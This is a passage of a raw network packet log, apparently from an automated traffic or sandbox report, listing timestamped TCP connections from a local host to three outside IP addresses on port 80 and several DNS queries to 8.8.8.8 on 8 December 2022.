Dec 8, 2022 20:23:16.188112020 CET	80	49726	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:16.188215017 CET	49726	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:16.188467979 CET	49726	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:16.216896057 CET	80	49726	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:16.216936111 CET	80	49726	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:16.216952085 CET	80	49726	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:16.217113972 CET	49726	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:16.219244957 CET	49726	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:16.219676018 CET	49724	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:16.221255064 CET	49727	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:16.249104023 CET	80	49724	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:16.250791073 CET	80	49727	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:16.251360893 CET	49724	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:16.251415968 CET	49727	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:16.253336906 CET	49727	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:16.282835007 CET	80	49727	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:16.282865047 CET	80	49727	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:16.282979012 CET	49727	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:20.012861967 CET	49728	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:20.034286022 CET	80	49728	88.198.29.97	192.168.2.4
Dec 8, 2022 20:23:20.034394026 CET	49728	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:20.034749985 CET	49728	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:20.056341887 CET	80	49728	88.198.29.97	192.168.2.4
Dec 8, 2022 20:23:20.056498051 CET	49728	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:20.103642941 CET	49729	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:20.133017063 CET	80	49729	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:20.133260965 CET	49729	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:20.135998011 CET	49729	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:20.165115118 CET	80	49729	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:20.165240049 CET	80	49729	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:20.165257931 CET	80	49729	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:20.165333986 CET	49729	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:20.165582895 CET	49729	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:20.170119047 CET	49727	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:20.171037912 CET	49730	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:20.199677944 CET	80	49727	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:20.199930906 CET	80	49730	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:20.200191975 CET	49730	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:20.201267958 CET	49730	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:20.201630116 CET	49727	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:20.231684923 CET	80	49730	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:20.231724977 CET	80	49730	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:20.231833935 CET	49730	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:22.360567093 CET	49731	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:22.526388884 CET	80	49731	64.70.19.203	192.168.2.4
Dec 8, 2022 20:23:22.528642893 CET	49731	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:22.551970959 CET	49731	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:22.717720032 CET	80	49731	64.70.19.203	192.168.2.4
Dec 8, 2022 20:23:22.717881918 CET	49731	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:25.372195959 CET	49732	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:25.401452065 CET	80	49732	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:25.401743889 CET	49732	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:25.435086012 CET	49732	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:25.464297056 CET	80	49732	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:25.464356899 CET	80	49732	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:25.464381933 CET	80	49732	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:25.464560986 CET	49732	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:25.842973948 CET	49732	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:25.919825077 CET	49730	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:25.921288967 CET	49733	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:25.949057102 CET	80	49730	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:25.949141979 CET	49730	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:25.950365067 CET	80	49733	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:25.950525045 CET	49733	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:25.952943087 CET	49733	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:25.982105017 CET	80	49733	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:25.982188940 CET	80	49733	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:25.982352018 CET	49733	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:26.861923933 CET	49734	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:26.883330107 CET	80	49734	88.198.29.97	192.168.2.4
Dec 8, 2022 20:23:26.883616924 CET	49734	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:26.890258074 CET	49734	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:26.911864042 CET	80	49734	88.198.29.97	192.168.2.4
Dec 8, 2022 20:23:26.912034035 CET	49734	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:23:27.001718044 CET	49735	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:27.031553030 CET	80	49735	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:27.031682968 CET	49735	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:27.031990051 CET	49735	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:27.060978889 CET	80	49735	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:27.061037064 CET	80	49735	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:27.061058044 CET	80	49735	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:27.061270952 CET	49735	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:27.061480999 CET	49735	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:27.062041998 CET	49733	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:27.063694954 CET	49736	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:27.091159105 CET	80	49733	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:27.091274977 CET	49733	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:27.092627048 CET	80	49736	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:27.092756033 CET	49736	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:27.136780977 CET	49736	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:27.166098118 CET	80	49736	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:27.166136980 CET	80	49736	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:27.166290045 CET	49736	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:31.447022915 CET	49737	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:31.612781048 CET	80	49737	64.70.19.203	192.168.2.4
Dec 8, 2022 20:23:31.612974882 CET	49737	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:31.613286018 CET	49737	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:31.641251087 CET	49738	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:31.670403004 CET	80	49738	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:31.670586109 CET	49738	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:31.670860052 CET	49738	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:31.699976921 CET	80	49738	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:31.700038910 CET	80	49738	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:31.700074911 CET	80	49738	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:31.700248003 CET	49738	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:31.706552982 CET	49738	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:31.709830046 CET	49736	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:31.710866928 CET	49739	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:31.734849930 CET	80	49739	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:31.735097885 CET	49739	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:31.735656977 CET	49739	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:31.738953114 CET	80	49736	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:31.739069939 CET	49736	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:31.759427071 CET	80	49739	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:31.759468079 CET	80	49739	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:31.759546041 CET	49739	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:31.779681921 CET	80	49737	64.70.19.203	192.168.2.4
Dec 8, 2022 20:23:31.779844046 CET	49737	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:33.729168892 CET	49740	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:33.894308090 CET	80	49740	64.70.19.203	192.168.2.4
Dec 8, 2022 20:23:33.896889925 CET	49740	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:33.897142887 CET	49740	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:34.065479040 CET	80	49740	64.70.19.203	192.168.2.4
Dec 8, 2022 20:23:34.065560102 CET	49740	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:34.175934076 CET	49741	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:34.199250937 CET	80	49741	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:34.199435949 CET	49741	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:34.219074965 CET	49741	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:34.242341995 CET	80	49741	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:34.242393017 CET	80	49741	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:34.242413998 CET	80	49741	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:34.242593050 CET	49741	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:34.242789984 CET	49741	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:34.243607998 CET	49739	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:34.251951933 CET	49742	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:34.267518044 CET	80	49739	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:34.267653942 CET	49739	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:34.281275988 CET	80	49742	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:34.281388044 CET	49742	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:34.282067060 CET	49742	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:34.311466932 CET	80	49742	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:34.311501026 CET	80	49742	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:34.311650038 CET	49742	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:39.299000025 CET	49743	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:39.464003086 CET	80	49743	64.70.19.203	192.168.2.4
Dec 8, 2022 20:23:39.464149952 CET	49743	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:39.464412928 CET	49743	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:39.629740953 CET	80	49743	64.70.19.203	192.168.2.4
Dec 8, 2022 20:23:39.629837036 CET	49743	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:39.641994953 CET	49744	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:39.670774937 CET	80	49744	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:39.672601938 CET	49744	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:39.672869921 CET	49744	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:39.701394081 CET	80	49744	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:39.701433897 CET	80	49744	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:39.701522112 CET	80	49744	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:39.701761961 CET	49744	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:39.701832056 CET	49744	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:39.704226017 CET	49742	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:39.705919981 CET	49745	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:39.733768940 CET	80	49742	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:39.733958006 CET	49742	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:39.735618114 CET	80	49745	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:39.735729933 CET	49745	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:39.736589909 CET	49745	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:39.766165018 CET	80	49745	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:39.766236067 CET	80	49745	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:39.766438007 CET	49745	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:40.676697969 CET	49746	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:40.842313051 CET	80	49746	64.70.19.203	192.168.2.4
Dec 8, 2022 20:23:40.845257044 CET	49746	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:40.845514059 CET	49746	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:41.010857105 CET	80	49746	64.70.19.203	192.168.2.4
Dec 8, 2022 20:23:41.010961056 CET	49746	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:41.156440973 CET	49747	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:41.185712099 CET	80	49747	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:41.185832024 CET	49747	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:41.186084032 CET	49747	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:41.215023994 CET	80	49747	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:41.215053082 CET	80	49747	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:41.215065956 CET	80	49747	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:41.215207100 CET	49747	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:41.215389967 CET	49747	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:41.216739893 CET	49745	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:41.218347073 CET	49748	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:41.246542931 CET	80	49745	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:41.247266054 CET	80	49748	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:41.247726917 CET	49745	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:41.247775078 CET	49748	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:41.250930071 CET	49748	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:41.280103922 CET	80	49748	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:41.280184031 CET	80	49748	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:41.280358076 CET	49748	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:51.440593958 CET	49749	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:51.605932951 CET	80	49749	64.70.19.203	192.168.2.4
Dec 8, 2022 20:23:51.606075048 CET	49749	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:51.606359959 CET	49749	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:51.771327972 CET	80	49749	64.70.19.203	192.168.2.4
Dec 8, 2022 20:23:51.771409988 CET	49749	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:51.793484926 CET	49750	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:51.822628021 CET	80	49750	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:51.822755098 CET	49750	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:51.823044062 CET	49750	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:51.851778030 CET	80	49750	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:51.851922035 CET	80	49750	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:51.851957083 CET	80	49750	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:51.852075100 CET	49750	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:51.852250099 CET	49750	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:51.856055021 CET	49748	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:51.857291937 CET	49751	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:51.884968996 CET	80	49748	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:51.885076046 CET	49748	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:51.886307955 CET	80	49751	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:51.886404037 CET	49751	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:51.886902094 CET	49751	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:51.916129112 CET	80	49751	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:51.916223049 CET	80	49751	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:51.916364908 CET	49751	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:53.958220005 CET	49752	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:54.123429060 CET	80	49752	64.70.19.203	192.168.2.4
Dec 8, 2022 20:23:54.123620987 CET	49752	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:54.138746977 CET	49752	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:54.304007053 CET	80	49752	64.70.19.203	192.168.2.4
Dec 8, 2022 20:23:54.304307938 CET	49752	80	192.168.2.4	64.70.19.203
Dec 8, 2022 20:23:54.363739967 CET	49753	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:54.393609047 CET	80	49753	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:54.393735886 CET	49753	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:54.394078970 CET	49753	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:54.423759937 CET	80	49753	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:54.423795938 CET	80	49753	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:54.423811913 CET	80	49753	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:54.423995972 CET	49753	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:54.424158096 CET	49753	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:54.426695108 CET	49751	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:54.428417921 CET	49754	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:54.455705881 CET	80	49751	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:54.455796003 CET	49751	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:54.457779884 CET	80	49754	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:54.457890987 CET	49754	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:54.458770990 CET	49754	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:23:54.488003016 CET	80	49754	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:54.488034964 CET	80	49754	167.99.35.88	192.168.2.4
Dec 8, 2022 20:23:54.488107920 CET	49754	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:02.238327026 CET	49755	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:24:02.259469986 CET	80	49755	88.198.29.97	192.168.2.4
Dec 8, 2022 20:24:02.266246080 CET	49755	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:24:02.353339911 CET	49755	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:24:02.374828100 CET	80	49755	88.198.29.97	192.168.2.4
Dec 8, 2022 20:24:02.378058910 CET	49755	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:24:02.789298058 CET	49756	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:02.819314003 CET	80	49756	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:02.823517084 CET	49756	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:02.846334934 CET	49756	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:02.875747919 CET	80	49756	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:02.875798941 CET	80	49756	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:02.875818968 CET	80	49756	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:02.876159906 CET	49756	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:02.876394987 CET	49756	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:02.878813028 CET	49754	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:02.880146027 CET	49757	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:02.908272028 CET	80	49754	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:02.909256935 CET	80	49757	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:02.925832987 CET	49754	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:02.925899982 CET	49757	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:06.005667925 CET	49757	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:06.035200119 CET	80	49757	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:06.035247087 CET	80	49757	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:06.037220001 CET	49757	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:07.718360901 CET	49758	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:24:07.740070105 CET	80	49758	88.198.29.97	192.168.2.4
Dec 8, 2022 20:24:07.740190029 CET	49758	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:24:07.740567923 CET	49758	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:24:07.762520075 CET	80	49758	88.198.29.97	192.168.2.4
Dec 8, 2022 20:24:07.763245106 CET	49758	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:24:07.864706993 CET	49759	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:07.888127089 CET	80	49759	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:07.889488935 CET	49759	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:07.895109892 CET	49759	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:07.918262005 CET	80	49759	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:07.918298006 CET	80	49759	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:07.918315887 CET	80	49759	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:07.918481112 CET	49759	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:07.918705940 CET	49759	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:07.921771049 CET	49757	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:07.923273087 CET	49760	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:07.946727037 CET	80	49760	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:07.946957111 CET	49760	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:07.948316097 CET	49760	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:07.951260090 CET	80	49757	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:07.953576088 CET	49757	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:07.971703053 CET	80	49760	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:07.971746922 CET	80	49760	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:07.971962929 CET	49760	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:10.490669966 CET	49761	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:24:10.512708902 CET	80	49761	88.198.29.97	192.168.2.4
Dec 8, 2022 20:24:10.512919903 CET	49761	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:24:10.513145924 CET	49761	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:24:10.534846067 CET	80	49761	88.198.29.97	192.168.2.4
Dec 8, 2022 20:24:10.534967899 CET	49761	80	192.168.2.4	88.198.29.97
Dec 8, 2022 20:24:10.598031044 CET	49762	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:10.627310991 CET	80	49762	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:10.627446890 CET	49762	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:10.627754927 CET	49762	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:10.656734943 CET	80	49762	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:10.656758070 CET	80	49762	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:10.656774044 CET	80	49762	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:10.656871080 CET	49762	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:10.657079935 CET	49762	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:10.660010099 CET	49760	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:10.661592960 CET	49763	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:10.683351040 CET	80	49760	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:10.683468103 CET	49760	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:10.690382957 CET	80	49763	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:10.690624952 CET	49763	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:10.692466021 CET	49763	80	192.168.2.4	167.99.35.88
Dec 8, 2022 20:24:10.721306086 CET	80	49763	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:10.721329927 CET	80	49763	167.99.35.88	192.168.2.4
Dec 8, 2022 20:24:10.721431017 CET	49763	80	192.168.2.4	167.99.35.88

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 8, 2022 20:22:39.872745037 CET	56572	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:39.920676947 CET	53	56572	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:40.071707010 CET	50911	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:40.120923042 CET	53	50911	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:40.320388079 CET	59683	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:40.343619108 CET	53	59683	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:40.453785896 CET	64167	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:40.498470068 CET	53	64167	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:40.582278967 CET	58565	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:40.601792097 CET	53	58565	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:52.901825905 CET	52239	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:53.009057999 CET	53	52239	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:53.019768000 CET	56807	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:53.130599022 CET	53	56807	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:53.354224920 CET	61007	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:53.373845100 CET	53	61007	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:53.387741089 CET	60686	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:53.409143925 CET	53	60686	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:53.620306015 CET	61124	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:53.653202057 CET	53	61124	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:53.660624027 CET	59444	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:53.694746971 CET	53	59444	8.8.8.8	192.168.2.4
